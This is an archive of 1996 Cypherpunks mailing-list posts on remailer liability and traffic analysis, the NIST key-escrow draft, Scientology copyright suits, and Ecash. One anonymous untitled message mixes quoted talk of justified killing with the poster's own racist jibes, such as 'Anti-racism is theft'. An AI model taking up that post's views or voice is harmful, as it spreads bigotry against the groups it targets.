>  least as valid as the software licenses ("NOTICE: Opening this
>  envelope constitutes your agreement to the terms.. blah blah
>  blah") that are commonly used today.

IANAL, but I have one, and he said (a couple of years ago) that these  
shrinkwrap contracts are practically worthless without a signature.  At least  
this was how things were being handled in some districts.  Anyone care to  
comment?

crypto relevance:  Can RSADSI __really__ enforce the silly "thou shalt not  
call certain functions" restrictions in their 'license'?  I doubt it, but I  
would love for someone to prove me wrong.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 22 May 1996 13:25:35 +0800
To: jya@pipeline.com
Subject: Re: NIST Draft Key Escrow Paper
Message-ID: <v01510110adc7fabe19c0@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


The *most recent* draft version of the white paper -- not the early 5/10
version that I quoted from but the one publicly released yesterday -- is
available at http://www.epic.org/

We should thank the good folks at EPIC, those swell touch-typists, for
taking the time to put the paper online, along with their comments on it.

-Declan



>Date: Tue, 21 May 1996 15:55:08 GMT
>To: declan@well.com (Declan McCullagh)
>Subject: Re: NIST Draft Key Escrow Paper
>From: jya@pipeline.com (John Young)
>Cc: cypherpunks@toad.com, pfarrell@netcom.com
>X-PipeUser: jya
>X-PipeHub: pipeline.com
>X-PipeGCOS: (John Young)
>
>We've just heard back from Ed Roback of NIST that he'll fax us a copy of
>the Draft Key Escrow Paper, which we'll scan and send to Pat Farrell for
>his Web site. I'll ask Pat to announce it's availability when ready.
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 22 May 1996 14:28:23 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Hiding remailers behind nymservers...? (fwd)
In-Reply-To: <adc741aa1f021004ca2d@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960521183638.1238C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, Timothy C. May wrote:

[...]

> Now it may be that operating a remailer may be interpreted by some courts
> as being a "public nuisance," a theory I credit to Brad Templeton, but this
> has not yet come even close to happening.

Brad might be on the mark.
One famous case ended in the result of declaring a union leader a public
nusiance.

> --Tim May

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Sobel" <sobel@epic.org>
Date: Wed, 22 May 1996 13:27:38 +0800
To: "Declan McCullagh" <jya@pipeline.com
Subject: Re: NIST Draft Key Escrow P
Message-ID: <n1379418383.43245@epic.org>
MIME-Version: 1.0
Content-Type: text/plain



Declan McCullagh wrote:

>The *most recent* draft version of the white paper -- not the early 5/10
>version that I quoted from but the one publicly released yesterday -- is
>available at http://www.epic.org/
>
>We should thank the good folks at EPIC, those swell touch-typists, for
>taking the time to put the paper online, along with their comments on it.
>
>-Declan

And EPIC's thanks to Pat Farrell, who actually made the *appendices*
available online as well.  Having found Pat's work, we've now
appended the appendices (?) to our version of the paper.

- David








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Wed, 22 May 1996 14:13:48 +0800
To: "Daniel R. Oelke" <droelke@rdxsunhost.aud.alcatel.com>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <9605212219.AA05501@spirit.aud.alcatel.com>
Message-ID: <Pine.A32.3.93.960521183731.12238A-100000@seminole.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 21 May 1996, Daniel R. Oelke wrote:

> 
> Ben Holiday <ncognito@gate.net> wrote:
> > At this point there are 2 options, which I havnt examined closely: The
> > first is that you require them to send a request for their "consent-code"
> > which can be used to decrypt the mail. Under this arrangment you could
> 
> This could be done with no "storage" as well, by a slightly
> different method and still require end reciepient acknowledgement. 
> The end reciepient could be required to reply and include the encrypted
> message. The remailer would then decrypt the message and send back the 
> plaintext.  Only storage would be the key vs. a message id database.

Well, if we've gone that far, why not attach an encrypted copy of the key
to the peice of mail, and eliminate all storage from the r-ops machine? 


> > The second is to simply include the
> > consent-code along with the encrypted peice of mail and a legal notice
> > stating that decryption of the mail constitutes your consent to receive
> > the mail, as well as your agreement to hold the remailer-operator harmless
> 
> By reduction - you could just do a rot13 on the message and 
> append the "legal notice".   If all the information for decoding
> a message is present in that message, is a different encoding
> mechanism really any different from straight ASCII text?  
> (i.e. Netscape 9.13 might have auto decoding built it....)
> Then, the user doesn't do anything "extra" - does this invalidate 
> the notice?

Donno. IANAL. :)

> I might be wrong, but I don't think that this second method would
> gain you anything in the 2 situations where operators will get 
> hassled.  1) Posting of copyrighted material - the lawyers will
> at least harass you no matter what kind of legal notice is up front.
> 2) Mailing of "harassing" information - the person still gets
> unwanted email, and has no way to stop it.

[RANT MODE ON- skip to the next paragraph if you dont like politiks]

Here we are back at step one again. In the end, it would seem that there
isn't much that can be done about the worst forms of abuse, without
filtering mail for content. However, someone pointed out that other
package delivery services have acheived freedom from responsibilty for the
content of the packages they deliver - and I beleive that a part of the
explanation for this lies in the fact that they /do/ make attempts to
limit abuse in-so-far as they are able. Part of limiting the remailers
liability is tied up with legitimizing them as a useful service, and
establishing to the public that we are concerned with abuse. Too many
people beleive that the whole point of a remailer is to facilitate illegal
and abusive communication, and unless that changes we can expect to be
dealt with as criminals at worst, or at best as purposfully negligent.

I'm not certain what the solution is, but I am certain that doing nothing
isnt it...

[RANT MODE OFF--]

One idea that came up a while back was a sort of limited tracking of mail
-- an example would be keeping a hash of the email address where mail was
received from for 48 hours, with the hash value being attached to the
peice of mail as a header.

This would accomplish two things: We could source block an address without
knowing the source; and if push came to shove an address could be
backtracked to its original source, provided a complaint was made in time,
and that the Bad Guy sent another mail from the same address. I think
that legally there would be a good argument that the remailer ops had made
a reasonable attempt and holding lawbreakers accountable, while still
preserving the anonymity of non-abusers.



Just a thought.. 

Ben.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Wed, 22 May 1996 08:03:19 +0800
To: cypherpunks@toad.com
Subject: Re: Long-Lived Remailers
Message-ID: <Pine.3.89.9605211908.A27068-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, Timothy C. May wrote:

> The Church of Clams can simply send messages addressed to themselves
> through the Alice remailer and see immediately that they appear to come
> from Bob.

Good point... oops ;-)...

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pat Farrell <pfarrell@netcom.com>
Date: Wed, 22 May 1996 14:31:34 +0800
To: cypherpunks@toad.com
Subject: alternative sites for NIST GAK 3 draft
Message-ID: <199605212318.QAA07251@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The computer at, and link to, www.isse.gmu.edu are slow and old.
If you have trouble, copies are also at:

http://www.epic.org/crypto/key_escrow/white_paper.html

 and

http://www.eff.org/pub/Privacy/Key_escrow/Clipper_III

Other related stuff at eff.org will go here when available. (c.f. 
.../Key_escrow/Clipper_II and .../Key_escrow/Clipper, predictably).

Pat
Pat Farrell        Grad Student         http://www.isse.gmu.edu/~pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen Ethridge)
Date: Wed, 22 May 1996 13:17:17 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers, Copyright, and Scientology
In-Reply-To: <adc67d21170210049d4e@[205.199.118.202]>
Message-ID: <199605211936447595590@central10.onramp.net>
MIME-Version: 1.0
Content-Type: text/plain


> At 6:15 PM 5/20/96, Rich Burroughs wrote:
> >At 01:08 AM 5/20/96 -0700, tcmay@got.net (Timothy C. May) wrote:
> >[snip]
> >>And the issue of CoS seeking legal actions against those they claim are
> >>violating their copyrights is separable from their religious status.
> >
> >Not at all.  Their actions are based on their religious doctrines, as passed
> >down by Hubbard.  "Always attack, never defend."  Their claims of copyright
> >violation are part of an ongoing effort to silence those who criticize their
> >illegal and immoral practices.  They should be examined in that context.
> 
> I don't care what their motivations, religious or other, are.
> 
> As I see it, some people here (including some good friends of mine, by the
> way) are caught up in a religious war. Those opposed to CoS are "outing"
> putative CoS secrets by aggressive use of remailers. The CoS is fighting
> back. Is anyone surprised?

I've been following alt.religion.scientology mostly for entertainment
reasons, and occasionally to correct some of the false statements about
psychiatry made by Scientologists.  There's more to the story than you
appear to be aware of.  The extra-legal actions didn't originate with
the alleged copyright violations, nor are the legal actions of the cult
limited to protecting their copyrights.  Now that the cypherpunks have
been brought to their attention it's entirely possible that the major
posters on this newsgroup will become the subject of Scientology's, or
rather Religious Technology Center's legal actions.

I believe the original legal action relates to the posting of court
documents that contained cult scripture.  And the cease and desist
letters are sent for what are clearly fair use extracts.  If someone
were to be so unkind as to post a certain six sentences to this
newsgroup we might see toad.com shut down.

Yes, the cult does have a legitimate interest in protecting their
copyrights.  No, the cult does not have a valid reason for using the
heavy-handed legal tactics of which they are so fond.


-- 
if not me, then who?
mailto:ethridge@onramp.net
http://rampages.onramp.net/~ethridge/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 22 May 1996 16:33:46 +0800
To: cypherpunks@toad.com
Subject: Re: Long-Lived Remailers
In-Reply-To: <adc74a7e21021004dd37@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960521193756.954A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, Timothy C. May wrote:

> At 3:00 PM 5/21/96, Rev. Mark Grant, ULC wrote:
> >On Tue, 21 May 1996, Timothy C. May wrote:
> >> Traffic analysis will be quite easy to do, of course, as all mail sent to
> >> the persistent address comes out of the "disposable@foo.com" address.
> >> Q.E.D.
> >
> >Yeah, but the attack model I was assuming was lawyers rather than
> >intelligence agencies. The NSA could probably easily link the two
> >together, but the Church of Foobar(tm) probably couldn't. They'd only have
> >access to the logs on the ISP and the information you gave when you signed
> >up, not the raw packets on the Net.
> 
> The traffic analysis on this fixed mapping system needs no access to
> packets and is childishly simple.
> 
> Let's call the first site "Alice" and the emanation site "Bob."
> 
> That is, all messages sent to the persistent site Alice appear to come from
> the site Bob.
> 
> The Church of Clams can simply send messages addressed to themselves
> through the Alice remailer and see immediately that they appear to come
> from Bob.

	Randomize the output remailer? Sometimes Alice exits Bob,
Sometimes Charlie, sometimes Tom etc. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <>
Date: Wed, 22 May 1996 14:51:32 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605220243.TAA00264@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! Theses peoples refuse to register their guns, although it is 
! mandatory in canada (to be registered within 7(?) years...)

There has been total firearm registration since 1968.

! > >> >You'll note that the psycho-epistemology necessary to
! > >> >commit murder is quite close to the one necessary to coerce
! > >> >poeples to pay taxes.

You'll note that the psycho-epistemology necessary to
commit murder is quite close to the one necessary to coerce
poeples to pay rent.

! > Not really, only the time in history. Their property was
! > 100% taken, and they were marched to OK from GA. The IRS
! > may be bad...but they aren't THAT bad...[disclaimer: I
! > am (a tiny) part Cherokee.

Consider that many whites feel guilty if they feel they don't have any afro-asian bloodlines.
Consider the dangers of anti-racism to your self-esteem.

! You did not answer my question:  When our local Mohawks accuse the 
! white peoples to have stolen their land, I ask "when did I do that?  
! I can't remember..."  I refuse to be held responsible for things that 
! were done several hundred years ago.  Period.  As I said, I *never*, 
! not even in my early years, believed in original sin.  

Then you hold irresponsible refusals.

! > >Are you talking of an open war a la Bosnia?  
! > 
! > Hopefully not.

Who can tell how far the anti-racists will go to establish their power cult.

! > and the legitimate self defense
! > options which are peaceful have not been adequately explored. IMO

Racism.

! > >> Bottom line for me: "Two wrongs don't make a right." 
! > >
! > >Please state the basic premise that make you declare what is
! > >"wrong" in the context of AP.

They Always lie on racial issues.

! I am sorry, but I do not accept that as a valid argument.  What if 
! somebody came to take away your means of feeding your kids?
! What if somebody was menacing you or your kids?
! There are instances, as you seem to agree, when killing is justified. 
! What is meant by the sentence is: Thou shalt not initiate lethal 
! violence.  

Racism.

! > Taxation is theft, I fail to see your point. Well, depends.  

Anti-racism is theft.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Wed, 22 May 1996 14:22:24 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Long-Lived Remailers
In-Reply-To: <adc74a7e21021004dd37@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960521194258.176A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> That is, all messages sent to the persistent site Alice appear to come from
> the site Bob.
> The Church of Clams can simply send messages addressed to themselves
> through the Alice remailer and see immediately that they appear to come
> from Bob.

But this does not prove that _all_ messages from Bob came from Alice. The
only messages the Church can prove went through Alice, are the messages
they themselves sent through Alice. 

It would not help the Church to say "We know our trade-secret Mystical
Clam Chowder Recipie went through the Alice remailer, because we sent it
through that remailer ourselves." Also, Alice could also demonstrate
sending a message through Bob without using the Alice remailer at all. 

I am assuming that in this hypothetical situation, remailers themselves
are not illegal, but the owners are held responisble for what goes through
them. I am also assuming that Bob does not have any records that show the
offending message coming from Alice. 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMaJ+cttVWdufMXJpAQHcAwf/Z+H1K5eT4s8lrBOwbTYg7d/WDZdeCGp+
BlFforZbh50xlt1ekM/cuYN23iOyQMX/eqgCSmTcwgYKWIu6YEAQYLLJsSKsuyFj
dVTdA2rbD5hhkh9cNfVH5KGlvHb4LIUE0Zif2oMJEHaYq81i2h1AIfXIQsg0EA3s
JAIDW7tThzfG10ezMspVSXSZ1zfi7Hr3F8/weaObOE02sB1GbL/HxK/1gGZUT21W
dpvT4Llfif8ElsmbogmnSL4jZEsabcfCa+fej5SsBP/ewiJOmlwyf5XkUZBxIR28
VKaZ99FA2ohKbE62DPlajFLQ1s1JZIztRD0W3u89xGgU7wAkYSGa4g==
=GuP+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 22 May 1996 14:35:32 +0800
To: cypherpunks@toad.com
Subject: Re: Rumor: DSS Broken?
In-Reply-To: <199605211740.KAA02723@mail.pacifier.com>
Message-ID: <Pine.LNX.3.93.960521194417.954C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, jim bell wrote:
> >Also, there are expert cryptographers outside the NSA, and outside the US;
> >you might check where Dobbertin lives.  And this is a Good Thing.
> 
> Yes, it is.  But I'd like to think that the NSA isn't acting as if WE are 
> the "enemy."

	I'd like to beleive that Santa will bring me Sparc20. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 15:57:51 +0800
To: cypherpunks@toad.com
Subject: Re: NIST Draft Key Escrow Paper
Message-ID: <199605220249.TAA14476@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


A few comments on the NIST draft.


SUBJECT:  Draft Paper, "Enabling Privacy, Commerce, Security
          and Public Safety in the Global Information
          Infrastructure"
FROM:     Bruce W. McConnell [Initials]<br>
          Edward J. Appel [Initials]<br>
          Co-Chairs, Interagency Working Group on
          Cryptography Policy

> It would permit users and manufacturers free
>choice of encryption algorithm, facilitate international
>interoperability, preserve law enforcement access, and, most
>importantly, provide strong system security and integrity.

What if we don't WANT to "preserve law enforcement access"?  What if we 
believe that, as individuals and as a society, we would be safer and better 
off to emasculate the government-employed thugs?

>     Recognizing that a robust infrastructure is not yet a
>reality, we are also considering measures to liberalize export
>policy for some non-escrowed products.

Why restrict it at all?

>Enabling Privacy, Commerce, Security and Public Safety in the
>Global Information Infrastructure

Too bad they weren't more honest and said, "Government employee safety."

>Government
>and industry must work together to create a security
>management infrastructure and attendant products that
>incorporate robust cryptography without undermining national
>security and public safety.

I don't believe this.  Do you?

> A policy for escrow of
>cryptographic keys which provides a basis for bilateral and
>multilateral government agreements must be determined so that
>industry can produce products for worldwide interoperability.

WRONG!  This is NOT necessary in the least.  Just allow free export, period.


>Industry will participate in defining algorithms and protocol
>standards, and will develop key escrow encryption products
>suitable for the protection of both government and private
>sector information and which will assure timely, lawful,
>government decryption access.

If this system is "voluntary" then why the "assure" part?  

> Government will help set
>standards for the Key Management Infrastructure (KMI) and
>deliver a market for robust security products.

In other words, it will shell out stolen tax dollars to willing 
co-conspirators.  No thank you!

 A KMI
>infrastructure and attendant key escrow products will provide
>many benefits, both domestic and internationally, as the US
>begins to realize the advantages of the global network for
improve commerce, security and public safety.

Most if not all of these advantages have no need for a "key management 
infrastructure."


> The nation's commerce is moving to
>networking. With these enormous changes, means must be found
>to responsibly raise the quality of cryptographic services
>without jeopardizing effective law enforcement, imperilling
>public safety.

I wish they'd be a bit more honest and use "government safety" instead of 
"public safety."


>     Industry and government must partner in the development
>of a public key-based key management infrastructure and
>attendant products that will assure participants can transmit
>and receive information electronically with confidence in the
>information's integrity, authenticity, and origin and which
>will assure timely lawful government access. 

Why, exactly, "must" industry do this?  This whole system is supposed to be 
"voluntary," right?


     There is a more compelling rationale for the government
to be a partner in the development of the KMI. Not only has
the Information Age sparked fundamental changes in the way we
interact, but reliance on information systems makes our
institutions vulnerable to an unprecedented degree.

Aha!  "our institutions vulnerable to an unprecented degree?"  You're 
catching on!  But it's primarily the GOVERNMENT institutions which are going 
to be vulnerable.

> Almost all
>institutions upon which public safety and national security
>depend, ranging from the power grid to military command and
>control, are at severe risk because of their presence in and
>dependence upon a global information infrastructure.

Yes, you guys know you're gonna get your statist butts kicked, right out the 
door.

(In case you couldn't imagine it, I'm grinning right now...)



> Additionally, the widespread
>use of encryption without safety features such as key recovery
>can pose serious risks to society.

No, not a risk to "society".  A risk to government and its agents.

> It will put at risk
>important law enforcement and national security investigations
>where electronic surveillance and search and seizure are
>essential in preserving and prosecuting crimes, and more
>importantly, in saving human life.

I choose to forgo these investigations and their advantages.  

>    Participation in the KMI will be voluntary. Key escrow in
>     the KMI will occur naturally through mutually trusted
>     authorities.

What do you mean, "Voluntary"?


>+    There will be a transition period during which legacy
>     equipments which do not support key recovery can be used
>     to communicate with users in emerging full featured KMIs.

Huh?  If this system is really "voluntary," this last paragraph doesn't make 
sense.


 >    Self-escrow will be permitted under specific
 >    circumstances.(1)

Huh?  What is the word "voluntary" supposed to mean, with relation to these 
statements?


>   Export controls on Key Escrow products will be relaxed
>     progressively as the infrastructure matures.

Why not eliminate escrow controls on all products?


(1)  The escrow agency must meet performance requirements for
     law enforcement access.

Again, whither "voluntary"?

<p>
>     To participate in the network a user needs a public key
>certificate signed by a CA which "binds" the user's identity
>to their public key.

That's simply wrong.  No certification is needed to use public-key 
encryption, as users of PGP well know.

> One condition of obtaining a certificate
>is that sufficient information (e.g., private keys or other
>information as appropriate) has been escrowed with a certified
>escrow authority to allow access to a user's data or
>communications.(3) (As noted before, this might be the CA or
>an independent escrow authority). The certificate creation
>process is pictured above.

Sounds like more abuse of the word, "voluntary."

>     For users to have confidence in the KMI, CAs must meet
>minimum standards for security, performance, and liability. A
>Policy Approving Authority (PAA) certifies CAs for operation.
>The PAA sets rules and responsibilities for ensuring the
>integrity of the CAs. The PAA is also responsible for setting
>CA performance criteria to meet law enforcement needs.

"Voluntary"?

>     If law enforcement has obtained legal authority to access
>a user's encrypted data or communications, it would certify
>that authorization to the escrow authority. The escrow
>authority will then relinquish information sufficient to
>access the user's communication.

"Voluntary"?

What if the user has already come to an agreement with the escrow authority 
that under no circumstances should any key be disclosed?  What if the user 
only gives the escrow authority an encrypted key?


>III. Some Issues
>     Difficult issues include i) how to refine the application
>of export controls, ii) whether and to what extent to permit
?self-escrow, 

More "voluntary" abuse...


>Export Controls
> The task, then, is to find a method of applying
>export controls that meets the interest of national security,
>public safety, privacy, and competitiveness.

Uh, have you forgotten about "individual freedom"?

>    Freedom to choose any mutually trusted certificate
>authority may accommodate the above interests.

How about "freedom to choose NO trusted certificate authority"?

>(4) In addition,
>allowing ready export of products of any bit length to markets
>where the key management infrastructure, which complies with
>statuatory constraints, is in place to permit government
>access to keys, would provide both a level market for U.S.
>manufacturers and higher quality security products for users.

I don't want a "level playing field" here.  I want a free, unrestricted, and 
open playing field.


>Products that meet defined performance requirements and which
>will not operate until the key is escrowed with an appropriate
>certificate authority will address commercial, public safety
>and national security needs.

But they won't address individual freedom needs.


(4)  A mutually trusted authority is an escrow agent trusted
     by users to store keys and trusted by law enforcement to
     provive access upon certification of lawful authority.

How can I trust any organization that will compromise my privacy on request 
by the government thugs?


>Transition
>     We are working toward a policy that permits licensing of
>key recovery encryption systems regardless of algorithm, bit
>length, or whether implemented in hardware or software, once
>needed infrastructure and government-to-government agreements
>are in place.

Don't bother.  I have an easier system already.  "Free and unencumbered 
exports for all software and hardware."
There, that's easy.


> In the interim we recognize that the policy must
>make it worthwhile for manufacturers and users to invest in
>escrowed KMI.

In other words, you want to misuse the power of government to bribe them 
into cooperation.


 With these objectives in mind, and consistent
>with applicable statutes,

But ignoring most of the US Constitution...


 the interim policy will consider:
<p>
Prior to formal government-to-government agreements:

>+    Permitting export of products that use an escrowed KMI to
>     approved markets, e.g., Europe or Australia, consistent
>     with the policies of the destination country.

What if "the politcies of the destination country" don't ask for ANY escrow 
system?  Are you saying you'll support free export in those cases?

>    Continuing and expanding the administration's previously
>     announced key escrow initiative by permitting the export
>     of 64 bit S/W or 80 bit H/W key escrow products that meet
>     defined performance requirements, after one-time review,
>     to any destination if keys will be escrowed in the U.S.,
>     or in foreign countries with which the U.S. has a
>     govvernment-to-government key escrow agreement.

Not acceptable.  How about 128-bit, non-escrowed softeware?  That would be a 
good start.


>   Permitting the export of other products on a case-by-case
>     determination that such exports are consistent with US
>     interests.

Maybe you meant, "government interests"?


>     The proposals for an interim export control policy are
>founded on the assumption that the products will require the
>use of an escrowed KMI in a country with which the U.S. has a
>government-to-government agreement. 

Aha!  So you're assuming THEIR country's thugs and OUR country's thugs will 
gang up on us?


>     The interim policy also reflects a judgment that overseas
>escrow of key will generally be permissible with suitable
>government-to-government arrangements. There is a concern that
>U.S. products with keys escrowed in the U.S. will not be
>saleable overseas. Hence, it may be possible to permit
>overseas escrow in Europe, even before government-to-
>government arrangments are completed. This exception is
>possible since the European countries are already moving to
>implement key escrow systems and we can reasonably expect to
>enter into law enforcement agreements in the near term.

Danger Will Robinson!  Danger!


>The
>OECD's goal of negotiating multilateral cryptography
>guidelines by 31 December 1996 is further evidence of European
>intent and momentum in infrastructure development.

YES!  Gotta make sure you don't get your collective butts kicked out of 
power , huh?


     The interim policy reflects a differentiation between
hardware and software products, i.e., hardware products with
greater bit lengths are treated more favorably under this
policy. Hardware implementations of products permit more
confident binding between encryption and the key management,
limiting the risk that the encryption can be easily stripped
from the key management and used independently of key
recovery. 

Uh, where's that "voluntary"?


>Software does not provide similar protection. This
>said, the interim policy to permit export of 64 bit software
>key recovery products would reflect a significant increase
>over the bit length restrictions applicable to non-key
>recovery products.

Self-Escrow
<p>
>     Self-escrow will be a principal concern of many large
>corporations that want to provide corporate data recovery,
>protect against loss of proprietary data from use of an
>outside escrow agent, and simply for reasons of efficiency and
>cost. Hence, self-escrow must be considered as an acceptable
>option.

How about "non-escrow"?

>     A solution is a national policy which allows CAs for an
>organization to serve as escrow authorities if they can meet
>necessary performance requirements. These requirements should
>be determined by government in consultation with industry and
>should address timeliness, security, confidentiality of
>requests for, or release of, keys, and independence of the
>escrow authority from the rest of the organization. To this
>end, the government should seek legislation that would shield
>organization certificate authorities from internal pressures
>in the course of law enforcement investigations.

In other words, you don't want "honesty" to affect the snitches?

>Legislation
>     There is some consensus that the ultimate legislative
>package should include provisions to criminalize the
>unauthorized disclosure/use of escrowed key, provisions to
>authorize civil actions by victims against those responsible
>for the unauthorized disclosure/use of escrowed key,
>provisions specifying the circumstances in which escrowed key
>may be requested and released (e.g., death of a family member
>or employee), and establishing liability protection for
>certificate authorities who exercizes due prudence in the
>fulfillment of their performance obligations.

What about requirements that people whose keys are requested be notified 
immediately of such a request and are given an opportunity to challenge it, 
or even better given an opportunity to demand that the key is erased, or 
given an opportunity to FAIL to provide a decrypt key to unlock the escrowed 
decrypt key?

  

>Government to Government Agreements
>
>     There is an expressed need by all govenments to have
>access to information affecting their own security 

Finally they admit it!

> To demonstrate resolve and good faith, the United States
>Government should immediately:
>

The only way the US government could demonstrate "good faith" is to disband 
itself immediately.

     6.   Negotiate with other governments arrangements for
          access to escrowed keys consistent with national
          sovereignty, national security, and public safety.
<p>
<p>
     As trusted partners, industry and government can share
expertise and tackle intractable problems such as the insecure
operating system. In times past, the cryptographic algorithm
was the core of the solution: now it is the easy part. The
debate over algorithms and bit lengths should end: it is time
for industry and governments to work together to secure the
GII in such a way that does not put the world at risk.


We agree that "the debate over algorithms and bit lengths should end."  We 
just think it should end with complete and total elimination of export 
restrictions.  Period!


<p>
Key Recovery Performance Criteria
<p>
     Key recovery provides for backup storage of a user's
private keys. This backup capability helps ensure the
availability of a user's data even after it has been
encrypted. It also provides for an effective means for law
enforcement access. Key recovery requirements whould be viewed
from the perspective of the individual, the corporation, or
governments that require access. Most of the criteria to be
discussed have a dimension for key recovery on an individual
basis as well as from a corporate or government perspective.
The criteria can be grouped into three categories.


+    Confidentiality - Confidentiality must be maintained on
     all requests for release of key recovery information.

WHY?  If the system is VOLUNTARY....


[is there some reason that the bozo didn't include an email address?]

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Wed, 22 May 1996 07:12:25 +0800
To: bryce@digicash.com
Subject: Re: The Crisis with Remailers
Message-ID: <2.2.32.19960521175237.0036cc44@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 17:44 1996-05-21 +0200, bryce@digicash.com wrote:
>Matts, you don't want to do floating point for money, because
>floating point doesn't give you good control of precision.

Yes I do. Several major currency traders in Sweden keep all
their money in 64 bit floating point storage. I think that DigiCash
will go floating point (get real?) when you start doing currency.
If you sell 1 DEM, you don't want to get paid in cents, you want
to get paid in 10-15 decimal places. That's where the currency
action is right now, and before Ecash(tm) is fully deployed we'll
probably see traders going for 15-20 decimal places. Floating
point is the way to do it, but are your accountants ready for it?

>Keep in mind that only Ecash(tm) Mints can create Ecash(tm) 
>coins and choose what values the coins have.

Sorry, I thought that the client created the coins and the mint
just signed them. I guess I should go back to RTFAPI.

Regards,

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 22 May 1996 14:35:50 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <Pine.A32.3.93.960521152031.52974B-100000@hopi.gate.net>
Message-ID: <Pine.GUL.3.93.960521195547.6458S-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, Ben Holiday wrote:

> After pondering a bit it seems to me that the "knock knock" remailer
> approach (only send anon-mail if the recipient agrees to receive it) could
> be made feasable pretty easily.
> 
> Rather than hold the mail while waiting for a consent to release, you
> could simply encrypt the peice of mail with a symetric algorythm on its
> final hop, and send the encrypted mail to the recipient. 

Interesting idea, but anything requiring specific software on the user's
end is a losing proposition IMO. 

remailer-operators@c2.org removed cuz I ain't one.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 22 May 1996 14:37:44 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers, Copyright, and Scientology
Message-ID: <adc7d04a270210044cac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:36 AM 5/22/96, Allen Ethridge wrote:

>I've been following alt.religion.scientology mostly for entertainment
>reasons, and occasionally to correct some of the false statements about
>psychiatry made by Scientologists.  There's more to the story than you
>appear to be aware of.  The extra-legal actions didn't originate with
>the alleged copyright violations, nor are the legal actions of the cult
>limited to protecting their copyrights.  Now that the cypherpunks have
>been brought to their attention it's entirely possible that the major
>posters on this newsgroup will become the subject of Scientology's, or
>rather Religious Technology Center's legal actions.

Ironically, CoS was trying to determine my name, from Keith.

If I'm subpoenaed, I think I'll tell them to fuck off. I'm not a party to
the CoS business in any way, save for whatever influence I may have had
when the first remailers were implemented several years ago   (by others,
not me) and whatever ideas I may have discussed here on this list.

>Yes, the cult does have a legitimate interest in protecting their
>copyrights.  No, the cult does not have a valid reason for using the
>heavy-handed legal tactics of which they are so fond.

I'm not a defender of CoS, let's make this clear. I knew they were flakes
since I first heard of them back around 1967, before most of you were even
born.

